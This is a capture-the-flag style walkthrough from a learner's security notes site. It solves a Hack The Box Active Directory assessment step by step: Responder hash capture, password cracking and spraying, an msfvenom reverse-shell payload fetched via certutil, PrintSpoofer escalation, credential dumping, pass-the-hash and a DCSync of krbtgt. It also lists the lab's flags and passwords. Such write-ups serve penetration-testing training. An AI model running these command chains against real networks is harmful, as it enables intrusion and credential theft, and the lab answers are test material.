FaresMorcy
  • Whoami
  • Footprinting Labs
    • Lab - Easy
    • Lab - Medium
    • Lab - Hard
  • Shells & Payloads
    • The Live Engagement
  • Password Attacks
    • Lab - Easy
    • Lab - Medium
    • Lab - Hard
  • Active Directory Enumeration & Attacks
    • Active Directory Enumeration & Attacks
    • AD Enumeration & Attacks - Skills Assessment Part I
    • AD Enumeration & Attacks - Skills Assessment Part II
  • SOC Hackthebox Notes & Labs
    • Security Monitoring & SIEM Fundamentals Module
    • Windows Event Logs & Finding Evil Module
    • Introduction to Threat Hunting & Hunting With Elastic Module
    • Understanding Log Sources & Investigating with Splunk Module
      • Introduction To Splunk & SPL
      • Using Splunk Applications
      • Intrusion Detection With Splunk (Real-world Scenario)
      • Detecting Attacker Behavior With Splunk Based On TTPs
      • Detecting Attacker Behavior With Splunk Based On Analytics
      • Skills Assessment
    • Windows Attacks & Defense
      • Kerberoasting
      • AS-REProasting
      • GPP Passwords
      • GPO Permissions/GPO Files
      • Credentials in Shares
      • Credentials in Object Properties
      • DCSync
      • Golden Ticket
      • Kerberos Constrained Delegation
      • Print Spooler & NTLM Relaying
      • Coercing Attacks & Unconstrained Delegation
      • Object ACLs
      • PKI - ESC1
      • Skills Assessment
    • Intro to Network Traffic Analysis Module
    • YARA & Sigma for SOC Analysts Module
      • Developing YARA Rules
      • Hunting Evil with YARA (Windows Edition)
      • Hunting Evil with YARA (Linux Edition)
      • Sigma and Sigma Rules
      • Developing Sigma Rules
      • Hunting Evil with Sigma (Chainsaw Edition)
      • Hunting Evil with Sigma (Splunk Edition)
      • Skills Assessment
  • TryHackme SOC 1
    • TShark
      • TShark: The Basics
      • TShark: CLI Wireshark Features
      • TShark Challenge I: Teamwork
      • TShark Challenge II: Directory
    • Tempest
    • Boogeyman 1
    • Boogeyman 2
    • Boogeyman 3
  • TryHackme SOC 2
    • Advanced Splunk
      • Splunk: Exploring SPL
      • Splunk: Setting up a SOC Lab
      • Splunk: Dashboards and Reports
      • Splunk: Data Manipulation
      • Fixit
    • Advanced ELK
      • Slingshot
    • Threat Hunting
      • Threat Hunting: Foothold
      • Threat Hunting: Pivoting
      • Threat Hunting: Endgame
  • TryHackme Rooms
    • Investigating Windows
    • Splunk 2
    • Windows Network Analysis
  • Powershell Scripting Fundamentals
  • SANS SEC504 & Labs
    • Book one
      • Live Examination
      • Network Investigations
      • Memory Investigations
      • Malware Investigations
      • Accelerating IR with Generative AI
      • Bootcamp: Linux Olympics
      • Bootcamp: Powershell Olympics
    • Book Two
      • Hacker Tools and Techniques Introduction
      • Target Discovery and Enumeration
      • Discovery and Scanning with Nmap
      • Cloud Spotlight: Cloud Scanning
      • SMB Security
      • Defense Spotlight: Hayabusa and Sigma Rules
    • Book Three
      • Password Attacks
      • Cloud Spotlight: Microsoft 365 Password Attacks
      • Understanding Password Hashes
      • Password Cracking
      • Cloud Spotlight: Insecure Storage
      • Multipurpose Netcat
    • Book Four
      • Metasploit Framework
      • Drive-By Attacks
      • Command Injection
      • Cross-Site Scripting
      • SQL Injection
      • Cloud Spotlight: SSRF and IMDS
    • Book Five
      • Endpoint Security Bypass
      • Pivoting and Lateral Movement
      • Hijacking Attacks
      • Establishing Persistence
      • Defense Spotlight: RITA
      • Cloud Spotlight: Cloud Post-Exploitation
  • SANS SEC511 & Labs
    • Resources
      • Primers
      • References
      • Tools
        • Network
        • Elastic Stack
      • Printable Versions
    • Book One
      • Part One
      • Part Two
      • Part Three
    • Book Two
      • Part One
      • Part Two
      • Part Three
      • Part Four
    • Book Three
      • Part One
      • Part Two
      • Part Three
      • Part Four
    • Book Four
      • Part One
      • Part Two
      • Part Three Lab
      • Part Four Lab
    • Book Five
      • Part One Lab
      • Part Two Lab
      • Part Three Lab
  • CyberDefenders
    • XXE Infiltration Lab
    • T1594 Lab
    • RetailBreach Lab
    • DanaBot Lab
    • OpenWire Lab
    • BlueSky Ransomware Lab
    • Openfire Lab
    • Boss Of The SOC v1 Lab
    • GoldenSpray Lab
    • REvil Lab
    • ShadowRoast Lab
    • SolarDisruption Lab
    • Kerberoasted Lab
    • T1197 Lab
    • Amadey Lab
    • Malware Traffic Analysis 1 Lab
    • Insider Lab
    • Volatility Traces Lab
    • FalconEye Lab
    • GitTheGate Lab
    • Trident Lab
    • NerisBot Lab
  • Practical Windows Forensics
    • Data Collection
    • Examination
    • Disk Analysis Introduction
    • User Behavior
    • Overview of disk structures, partitions and file systems
    • Finding Evidence of Deleted Files with USN Journal Analysis
    • Analyzing Evidence of Program Execution
    • Finding Evidence of Persistence Mechanisms
    • Uncover Malicious Activity with Windows Event Log Analysis
    • Windows Memory Forensic Analysis
  • Hackthebox Rooms
    • Campfire-1
    • Compromised
    • Brutus
    • Trent
    • CrownJewel-1
  • WEInnovate Training
    • Weinnovate - Active Directory Task One
    • Build ELK Lab
      • Configure Elasticsearch and Kibana setup in ubuntu
      • Configure Fluent-Bit to send logs to ELK
      • Set up Winlogbeat & Filebeat for log collection
      • Send Logs from Winlogbeat through Logstash to ELK
      • Enable Windows Audit Policy & Winlogbeat
      • Elasticsearch API and Ingestion Pipeline
    • SOAR
      • Send Alerts To Email & Telegram Bot
      • Integrate Tines with ELK
    • SOC Practical Assessment
    • Lumma C2
    • Network Analysis
  • Build ELK Lab
    • Configure Elasticsearch and Kibana setup in ubuntu
    • Configure Fluent-Bit to send logs to ELK
    • Set up Winlogbeat & Filebeat for log collection
    • Send Logs from Winlogbeat through Logstash to ELK
    • Enable Windows Audit Policy & Winlogbeat
    • Elasticsearch API and Ingestion Pipeline
  • Build Home Lab - SOC Automation
    • Install & configure Sysmon for deep Windows event logging
    • Set up Wazuh & TheHive for threat detection & case management
    • Execute Mimikatz & create detection rules in Wazuh
    • Automate everything with Shuffle
    • Response to SSH Attack Using Shuffle, Wazuh, and TheHive
  • Home Lab (Attack & Defense Scenarios)
    • Pass-the-Hash Attack & Defense
    • Scheduled Task Attack & Defense
    • Kerberoasting Attack & Defense
    • Kerberos Constrained Delegation
    • Password Spraying Attack & Defense
    • Golden Ticket Attack & Defense
    • AS-REProasting Attack & Defense
    • DCSync Attack & Defense
  • Home Lab (FIN7 (Carbanak Group) – Point of Sale (POS) Attack on Hospitality Chains)
  • Home Lab (Lumma Stealer)
Powered by GitBook
On this page
  1. Active Directory Enumeration & Attacks

AD Enumeration & Attacks - Skills Assessment Part II

PreviousAD Enumeration & Attacks - Skills Assessment Part INextSOC Hackthebox Notes & Labs

Last updated 8 days ago

Scenario

Our client Inlanefreight has contracted us again to perform a full-scope internal penetration test. The client is looking to find and remediate as many flaws as possible before going through a merger & acquisition process. The new CISO is particularly worried about more nuanced AD security flaws that may have gone unnoticed during previous penetration tests. The client is not concerned about stealth/evasive tactics and has also provided us with a Parrot Linux VM within the internal network to get the best possible coverage of all angles of the network and the Active Directory environment. Connect to the internal attack host via SSH (you can also connect to it using xfreerdp as shown in the beginning of this module) and begin looking for a foothold into the domain. Once you have a foothold, enumerate the domain and look for flaws that can be utilized to move laterally, escalate privileges, and achieve domain compromise.

Q1) Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?

Let's begin with starting responder with the default settings

sudo responder -I ens224

Let's review the Responder logs to determine if any hashes were captured.

cat /usr/share/responder/logs/SMB-NTLMv2-SSP-172.16.7.3.txt

Answer: AB920

Q2) What is this user's cleartext password?

Let's save the hash to a file and attempt to crack it using Hashcat in order to retrieve the plaintext password.

hashcat -m 5600 ab920_hash /usr/share/wordlists/rockyou.txt

Answer: weasal

Q3) Submit the contents of the C:\flag.txt file on MS01.

Let's check which hosts are alive in the domain first

fping -asgq 172.16.7.0/23

Let's save these IP addresses to a file and use Nmap to enumerate them, identifying which one corresponds to MS01.

sudo nmap -v -A -iL hosts.txt
  • 172.16.7.3: DC01

  • 172.16.7.50: MS01

  • 172.16.7.60: SQL01

  • 172.16.7.240: Our Parrot machine

Let's verify whether the user ab920 can log in to 172.16.7.50, and determine which authentication protocol is supported for the connection.

crackmapexec smb 172.16.7.50 -u 'ab920' -p 'weasal'
crackmapexec winrm 172.16.7.50 -u 'ab920' -p 'weasal'

Let's use Evil-WinRM to authenticate with the ab920 account.

evil-winrm -i 172.16.7.50 -u 'ab920' -p 'weasal'

Answer: aud1t_gr0up_m3mbersh1ps!

Q4) Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

It is now time to create a list of target users to be used in the upcoming password spraying attack.

sudo crackmapexec smb 172.16.7.3 -u 'ab920' -p 'weasal' --users | tee  usernames.txt
cat usernames.txt | cut -d'\' -f2 | awk -F " " '{print $1}' | tee valid_users.txt

We now have 2,904 valid usernames in the domain. Let's now proceed with the password spraying attack.

kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 valid_users.txt Welcome1

Answer: BR086

Q5) What is this user's password?

Answer: Welcome1

Q6) Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?

Let's perform share enumeration to identify any shared resources on which we may have read access.

smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3

I found a shared folder named 'Department Shares' to which we have read access. Let's proceed to review its contents.

smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares'

I found a file named web.config in the results. Let's review its contents to identify any relevant information.

smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares' -A web.config

Answer: D@ta_bAse_adm1n!

Q7) Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

Next, we will use the obtained credentials to authenticate to SQL01 via mssqlclient.

python3 /usr/local/bin/mssqlclient.py inlanefreight/netdb:'D@ta_bAse_adm1n!'@172.16.7.60

We have successfully accessed SQL01; however, we do not have the necessary permissions to read the flag. Let's review our current permissions.

EXEC xp_cmdshell 'whoami /priv'

We have the SeImpersonatePrivilege enabled, which can be leveraged for privilege escalation by exploiting the PrintNightmare vulnerability.

Let's generate a payload using msfvenom, and also obtain PrintSpoofer.exe. We will download both files to the SQL01 server.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=1335 -f exe -o shell.exe

Next, let's downlaod the two files onto the sql server

xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/PrintSpoofer.exe C:\Users\Public\PrintSpoofer.exe"
xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/shell.exe C:\Users\Public\shell.exe"

Let's initiate the Meterpreter listener and proceed with the privilege escalation attack.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.7.240
set LPORT 1335
xp_cmdshell C:\Users\Public\PrintSpoofer.exe -c C:\Users\Public\shell.exe

It is now time to retrieve the flag.

more C:\Users\administrator\Desktop\flag.txt

Answer: s3imp3rs0nate_cl@ssic

Q8) Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

We now have system-level privileges on the SQL01 server; the next step is to attempt to retrieve the administrator's hash.

load kiwi
lsa_dump_creds

Next, we will use this hash to attempt a connection to the MS01 server.

evil-winrm -i 172.16.7.50 -u administrator -H bdaffbfe64f1fc646a3353be1c2c3c99

Answer: exc3ss1ve_adm1n_r1ights!

Q9) Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?

Let's proceed to download PowerView.ps1 on MS01 to enumerate Access Control Lists (ACLs).

certutil.exe -urlcache -f http://172.16.7.240:8000/PowerView.ps1 .\PowerView.ps1
Import-Module .\PowerView.ps1
Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID

I encountered an error while attempting this, so let's proceed using our Meterpreter session instead.

use exploit/windows/smb/psexec
set lhost 172.16.7.240
set rhosts 172.16.7.50
set smbuser administrator
set smbpass 00000000000000000000000000000000:bdaffbfe64f1fc646a3353be1c2c3c99
exploit
Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID

Let's apply a filter for the GenericAll permission.

Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID

Next, let'sconvert the security identifier (SID) to a username to identify the associated user.

Convert-SidtoName "S-1-5-21-3327542485-274640656-2609762496-4611"

Answer: CT059

Q10) Crack this user's password hash and submit the cleartext password as your answer.

For this task, we will use Inveigh on MS01 to conduct a man-in-the-middle attack in an attempt to capture the NTLM hash of the target user.

certutil.exe -urlcache -f http://172.16.7.240:8000/Inveigh.ps1 .\Inveigh.ps1
Import-Module .\Inveigh.ps1
Invoke-Inveigh -NBNS Y LLMNR Y -ConsoleOutput Y -FileOutput Y

Let's save this to a file and attempt to crack it using Hashcat.

hashcat -m 5600 CT059_hash /usr/share/wordlists/rockyou.txt

Answer: charlie1

Q11) Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

The user CT059 now has the GenericAll permission. Therefore, we can proceed to add this user to the Domain Admins group and initiate a DCSync attack.

Let's configure the proxychains configuration file (/etc/proxychains.conf) on the Parrot host to route traffic through a SOCKS4 proxy on port 9050. This setup will allow us to authenticate to the MS01 machine via RDP using the credentials of the user CT059.

sudo nano /etc/proxychains.conf

Next, establish an SSH connection and create a SOCKS proxy on local port 9050.

ssh -D 9050 htb-student@10.129.221.33

Let's now authenticate to the MS01 server via RDP using the credentials of user CT059.

proxychains xfreerdp /v:172.16.7.50 /u:CT059 /p:charlie1 /d:inlanefreight.local /dynamic-resolution /drive:Shared,//home/htb-ac-1224655/

Let's proceed to add this account to the Domain Admins group.

net group 'Domain Admins' ct059 /add /domain

It is now time to migrate to DC01.

$cred = New-Object System.Management.Automation.PSCredential("INLANEFREIGHT\CT059", (ConvertTo-SecureString "charlie1" -AsPlainText -Force))
Enter-PSSession -ComputerName DC01 -Credential $cred

Answer: acLs_f0r_th3_w1n!

Q12) Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise.

Now, let's authenticate to DC01 and execute a DCSync attack.

psexec.py inlanefreight.local/CT059:charlie1@172.16.7.3
lsadump::dcsync /user:inlanefreight\krbtgt

Answer: 7eba70412d81c1cd030d72a3e8dbe05f